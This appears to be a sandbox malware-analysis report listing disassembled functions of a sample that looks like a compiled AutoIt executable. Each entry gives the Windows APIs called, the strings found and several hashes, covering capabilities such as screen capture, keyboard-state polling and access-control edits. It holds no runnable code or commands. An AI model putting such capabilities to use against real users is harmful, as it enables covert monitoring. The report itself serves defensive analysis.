                                                            • Instruction Fuzzy Hash: 1581AE70118322AFD720CF54E988AAFBBE8FB88314F20452DF99593291D771D925CF92
                                                            Function 001F83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001F8766
                                                              • Part of subcall function 001F874A: GetLastError.KERNEL32(?,001F822A,?,?,?), ref: 001F8770
                                                              • Part of subcall function 001F874A: GetProcessHeap.KERNEL32(00000008,?,?,001F822A,?,?,?), ref: 001F877F
                                                              • Part of subcall function 001F874A: HeapAlloc.KERNEL32(00000000,?,001F822A,?,?,?), ref: 001F8786
                                                              • Part of subcall function 001F874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001F879D
                                                              • Part of subcall function 001F87E7: GetProcessHeap.KERNEL32(00000008,001F8240,00000000,00000000,?,001F8240,?), ref: 001F87F3
                                                              • Part of subcall function 001F87E7: HeapAlloc.KERNEL32(00000000,?,001F8240,?), ref: 001F87FA
                                                              • Part of subcall function 001F87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001F8240,?), ref: 001F880B
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001F8458
                                                            • _memset.LIBCMT ref: 001F846D
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001F848C
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F849D
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 001F84DA
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001F84F6
                                                            • GetLengthSid.ADVAPI32(?), ref: 001F8513
                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001F8522
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F8529
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001F854A
                                                            • CopySid.ADVAPI32(00000000), ref: 001F8551
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001F8582
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001F85A8
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001F85BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                            • String ID:
                                                            • API String ID: 3996160137-0
                                                            • Opcode ID: 3d3afc55e2a87d53b612eaf90ddc2e3f52c6bdf32c20fcf6e34ae659ad65696a
                                                            • Instruction ID: 9e534b4438c9a566e074c145a0ab468f8f0185840f6cf79c8a5a52c32764e75a
                                                            • Opcode Fuzzy Hash: 3d3afc55e2a87d53b612eaf90ddc2e3f52c6bdf32c20fcf6e34ae659ad65696a
                                                            • Instruction Fuzzy Hash: 3A612B71A00209ABDF10DFA4DD45EFEBBB9FF05310F148269E915A62A1DB319A15CF60
                                                            Function 0021762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 002176A2
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002176AE
                                                            • CreateCompatibleDC.GDI32(?), ref: 002176BA
                                                            • SelectObject.GDI32(00000000,?), ref: 002176C7
                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0021771B
                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00217757
                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0021777B
                                                            • SelectObject.GDI32(00000006,?), ref: 00217783
                                                            • DeleteObject.GDI32(?), ref: 0021778C
                                                            • DeleteDC.GDI32(00000006), ref: 00217793
                                                            • ReleaseDC.USER32(00000000,?), ref: 0021779E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                            • String ID: (
                                                            • API String ID: 2598888154-3887548279
                                                            • Opcode ID: 8194ea1bd0b08f8050bb9300f14b560d480ebb292cbf744dd2c20ffa92ebe305
                                                            • Instruction ID: a90619c4c079bbc57cdac25259d7299f686ee54f4bb7af33c353d12a0f9dc1ae
                                                            • Opcode Fuzzy Hash: 8194ea1bd0b08f8050bb9300f14b560d480ebb292cbf744dd2c20ffa92ebe305
                                                            • Instruction Fuzzy Hash: 6D516A75914209EFCB25CFA8DD88EAEBBF9EF48310F14852DF949A7210D731A951CB60
                                                            Function 001A6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001C0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,001A6C6C,?,00008000), ref: 001C0BB7
                                                              • Part of subcall function 001A48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A48A1,?,?,001A37C0,?), ref: 001A48CE
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001A6D0D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 001A6E5A
                                                              • Part of subcall function 001A59CD: _wcscpy.LIBCMT ref: 001A5A05
                                                              • Part of subcall function 001C387D: _iswctype.LIBCMT ref: 001C3885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 537147316-1018226102
                                                            • Opcode ID: b38ccae2da8d9c78e5b856aa4f0a780f8b7bc26d755c940126e3000ce45be8a8
                                                            • Instruction ID: 22714ea78229b84a84cf0eedc2ab481c1ea67324efa3d9a49a349665aeff6c2f
                                                            • Opcode Fuzzy Hash: b38ccae2da8d9c78e5b856aa4f0a780f8b7bc26d755c940126e3000ce45be8a8
                                                            • Instruction Fuzzy Hash: EA02913510C3419FC724EF24C891AAFBBE5BFAA354F04491EF486972A2DB70D949CB52
                                                            Function 001A45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 001A45F9
                                                            • GetMenuItemCount.USER32(00266890), ref: 001DD7CD
                                                            • GetMenuItemCount.USER32(00266890), ref: 001DD87D
                                                            • GetCursorPos.USER32(?), ref: 001DD8C1
                                                            • SetForegroundWindow.USER32(00000000), ref: 001DD8CA
                                                            • TrackPopupMenuEx.USER32(00266890,00000000,?,00000000,00000000,00000000), ref: 001DD8DD
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001DD8E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                            • String ID:
                                                            • API String ID: 2751501086-0
                                                            • Opcode ID: 5cf0ba9fa27fa7963f249f64913076ee56bc87abd5da546518c010100ceeee7e
                                                            • Instruction ID: af352131c1d02197692526f691ec7325e3b23ab83ea6ea0825418b5b7b82f5b8
                                                            • Opcode Fuzzy Hash: 5cf0ba9fa27fa7963f249f64913076ee56bc87abd5da546518c010100ceeee7e
                                                            • Instruction Fuzzy Hash: 8271E775600205BBEB359F64EC49FAABF64FF45768F204227F518662E1C7B16820DB90
                                                            Function 00218BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00218BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00218C19
                                                            • CoUninitialize.OLE32 ref: 00218C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00218D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00218E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00232C0C), ref: 00218E84
                                                            • CoGetObject.OLE32(?,00000000,00232C0C,?), ref: 00218EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00218EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00218F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00218F4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID: ,,#
                                                            • API String ID: 2395222682-1430289482
                                                            • Opcode ID: 00aa493b3b9270a612b2cd91697a1c43ab7d028037f64f3e90b9e494d38b7860
                                                            • Instruction ID: 681f733a674f0130112a81488c3335dc1afb4237cbbb6e194fc7af7287c67c8b
                                                            • Opcode Fuzzy Hash: 00aa493b3b9270a612b2cd91697a1c43ab7d028037f64f3e90b9e494d38b7860
                                                            • Instruction Fuzzy Hash: 32C14470218305AFD700DF64C88496BB7E9FF99748F00492DF98A9B260DB71ED86CB52
                                                            Function 002210A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00220038,?,?), ref: 002210BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 9abdd57f8467c13d7c4ec58eb4403c381de7cb1921160a8de1e9f678d1b90b09
                                                            • Instruction ID: b71351a335fc422670469f7f49339c3bfb2c86a5c3dd16f067e82f930d35ad02
                                                            • Opcode Fuzzy Hash: 9abdd57f8467c13d7c4ec58eb4403c381de7cb1921160a8de1e9f678d1b90b09
                                                            • Instruction Fuzzy Hash: 7C412B3016026ADBCF11EED0E891EEA3725AF35350F504558FC965B296DB70AE3ACB60
                                                            Function 00205569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001A7A84: _memmove.LIBCMT ref: 001A7B0D
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002055D2
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002055E8
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002055F9
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0020560B
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0020561C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: f8346b57e8204650944360bb8a694fcbc7363161842787820b58c16961621f93
                                                            • Instruction ID: 95bebd27972828656ee60e84395b6332cc57eccaac34056fb84b96ca983d5bcd
                                                            • Opcode Fuzzy Hash: f8346b57e8204650944360bb8a694fcbc7363161842787820b58c16961621f93
                                                            • Instruction Fuzzy Hash: 6211B6209B026979D720A661CC4ADFF7B7CEFA3B04F4405A9B801920D2DF710E19C9A5
                                                            Function 002048F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: bf7d238649ae54e467299ce4caed2f6f4c21e8019e07a0797a03c78fa2b8257b
                                                            • Instruction ID: afea599414a6f7c569d60574465301e2ee347fcdc9a5de1a4ec08f475e1098a4
                                                            • Opcode Fuzzy Hash: bf7d238649ae54e467299ce4caed2f6f4c21e8019e07a0797a03c78fa2b8257b
                                                            • Instruction Fuzzy Hash: B7110571914219BBCB20FB60AD0AFDF77BC9B11710F0041BAF504960A2EF70DA918A91
                                                            Function 00205217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0020521C
                                                              • Part of subcall function 001C0719: timeGetTime.WINMM(?,75C0B400,001B0FF9), ref: 001C071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00205248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0020526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0020528E
                                                            • SetActiveWindow.USER32 ref: 002052AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002052BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 002052DA
                                                            • Sleep.KERNEL32(000000FA), ref: 002052E5
                                                            • IsWindow.USER32 ref: 002052F1
                                                            • EndDialog.USER32(00000000), ref: 00205302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: f480748f7812ef848f6e02c06107e4308f602d21502a764297f6fe07afd497c0
                                                            • Instruction ID: a13d1747fb5e0521dd8a38c6540b980f359171ffda2dcafab3b07251bc468c69
                                                            • Opcode Fuzzy Hash: f480748f7812ef848f6e02c06107e4308f602d21502a764297f6fe07afd497c0
                                                            • Instruction Fuzzy Hash: BF218E70214706BFE7105FB0FE9DE263B69EF5534AF8064B8F806811B2DBA19C258E21
                                                            Function 0020D7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • CoInitialize.OLE32(00000000), ref: 0020D855
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0020D8E8
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 0020D8FC
                                                            • CoCreateInstance.OLE32(00232D7C,00000000,00000001,0025A89C,?), ref: 0020D948
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0020D9B7
                                                            • CoTaskMemFree.OLE32(?,?), ref: 0020DA0F
                                                            • _memset.LIBCMT ref: 0020DA4C
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0020DA88
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0020DAAB
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0020DAB2
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0020DAE9
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 0020DAEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: 2db30dde2dc3e8a30725495df28594f302a415a9b307e2df8f8c3253cce85d2c
                                                            • Instruction ID: eded5fe9c76510eed2bf1cdabaac0acc37bcf93f5d2b34839559add601091119
                                                            • Opcode Fuzzy Hash: 2db30dde2dc3e8a30725495df28594f302a415a9b307e2df8f8c3253cce85d2c
                                                            • Instruction Fuzzy Hash: 7DB11D75A10209AFDB14DFA4C888EAEBBF9FF49314B148469F905EB261DB30ED41CB50
                                                            Function 0020052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 002005A7
                                                            • SetKeyboardState.USER32(?), ref: 00200612
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00200632
                                                            • GetKeyState.USER32(000000A0), ref: 00200649
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00200678
                                                            • GetKeyState.USER32(000000A1), ref: 00200689
                                                            • GetAsyncKeyState.USER32(00000011), ref: 002006B5
                                                            • GetKeyState.USER32(00000011), ref: 002006C3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 002006EC
                                                            • GetKeyState.USER32(00000012), ref: 002006FA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00200723
                                                            • GetKeyState.USER32(0000005B), ref: 00200731
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 6aa2c064f944c3a69bfb26605d26a63df90ba616e982c8468b8238ee312d9d58
                                                            • Instruction ID: 3d895359b6e13ade9d95340e7667f40f0cd725655a79e577772c5f10d265fdd6
                                                            • Opcode Fuzzy Hash: 6aa2c064f944c3a69bfb26605d26a63df90ba616e982c8468b8238ee312d9d58
                                                            • Instruction Fuzzy Hash: 5D510930A1478929FB34DFA088947EAFFB59F01380F484599D5C2561C3DA64AB6CCF61
                                                            Function 001FC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 001FC746
                                                            • GetWindowRect.USER32(00000000,?), ref: 001FC758
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001FC7B6
                                                            • GetDlgItem.USER32(?,00000002), ref: 001FC7C1
                                                            • GetWindowRect.USER32(00000000,?), ref: 001FC7D3
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001FC827
                                                            • GetDlgItem.USER32(?,000003E9), ref: 001FC835
                                                            • GetWindowRect.USER32(00000000,?), ref: 001FC846
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001FC889
                                                            • GetDlgItem.USER32(?,000003EA), ref: 001FC897
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001FC8B4
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 001FC8C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: c5fd8948d8c3eaea3ca2426e38d446103f78f3b21790d7ee4ba0c01de7545c7b
                                                            • Instruction ID: c44e6079e2481b0080507e5a1781225f6e5e48409a91b2438df55386ca865afd
                                                            • Opcode Fuzzy Hash: c5fd8948d8c3eaea3ca2426e38d446103f78f3b21790d7ee4ba0c01de7545c7b
                                                            • Instruction Fuzzy Hash: 4D512471B00209BBDB18CFA9DE99ABEBBB9EB88711F14813DF615D7290D7709D018B50
                                                            Function 001A201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001A2036,?,00000000,?,?,?,?,001A16CB,00000000,?), ref: 001A1B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001A20D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001A216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 001DBEF6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF27
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF3E
